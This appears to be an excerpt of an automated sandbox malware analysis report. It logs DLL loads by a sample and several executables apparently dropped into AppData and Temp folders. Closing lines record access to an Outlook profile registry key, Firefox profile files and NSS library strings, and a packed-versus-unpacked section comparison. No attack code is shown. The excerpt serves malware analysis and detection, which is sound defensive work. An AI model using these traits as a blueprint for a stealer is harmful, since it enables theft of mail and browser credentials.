Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: apphelp.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: winmm.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: wininet.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: sspicli.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: kernel.appcore.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: uxtheme.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: mstask.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: windows.storage.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: wldp.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: mpr.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: dui70.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: duser.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: chartv.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: oleacc.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: atlthunk.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: textinputframework.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: coreuicomponents.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: coremessaging.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: ntmarta.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: wintypes.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: wintypes.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: wintypes.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: wtsapi32.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: winsta.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: textshaping.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: propsys.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: explorerframe.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: iertutil.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: profapi.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: edputil.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: urlmon.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: srvcli.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: netutils.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: appresolver.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: bcp47langs.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: slc.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: userenv.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: sppc.dll
Source: C:\Users\userAAKKKEBFCG.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2521033172.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2521033172.000000006C74D000.00000002.00000001.01000000.00000008.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.fufuc:R;.xixeray:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Unpacked PE file: 5.2.RoamingIJEGHJECFC.exe.340000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hoxupgqj:EW;fapapsdz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hoxupgqj:EW;fapapsdz:EW;.taggant:EW;
Source: C:\Users\userAAKKKEBFCG.exe Unpacked PE file: 8.2.userAAKKKEBFCG.exe.20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zywzqxul:EW;dpxiwhce:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zywzqxul:EW;dpxiwhce:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 9.2.explorti.exe.5a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hoxupgqj:EW;fapapsdz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hoxupgqj:EW;fapapsdz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 11.2.explorti.exe.5a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hoxupgqj:EW;fapapsdz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hoxupgqj:EW;fapapsdz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 15.2.axplong.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zywzqxul:EW;dpxiwhce:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zywzqxul:EW;dpxiwhce:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 16.2.axplong.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zywzqxul:EW;dpxiwhce:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zywzqxul:EW;dpxiwhce:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 19.2.explorti.exe.5a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hoxupgqj:EW;fapapsdz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hoxupgqj:EW;fapapsdz:EW;.taggant:EW;
